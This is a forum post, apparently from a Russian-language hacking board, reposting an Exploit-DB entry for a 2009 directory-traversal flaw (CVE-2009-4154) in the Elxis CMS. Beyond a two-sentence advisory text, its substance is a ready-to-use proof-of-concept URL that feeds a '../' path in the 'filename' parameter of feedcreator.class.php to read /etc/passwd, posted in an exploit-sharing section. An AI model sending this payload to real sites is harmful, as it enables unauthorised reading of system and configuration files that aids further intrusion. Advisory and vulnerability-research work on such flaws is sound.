Exploit Elxis - 'Filename' Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33383
Проверка EDB
  1. Пройдено
Автор
CR4WL3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4154
Дата публикации
2009-11-30
Код:
source: https://www.securityfocus.com/bid/37158/info

Elxis is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. 

http://www.example.com/includes/feedcreator.class.php?filename=../../../../../../etc/passwd
 
Источник
www.exploit-db.com

Похожие темы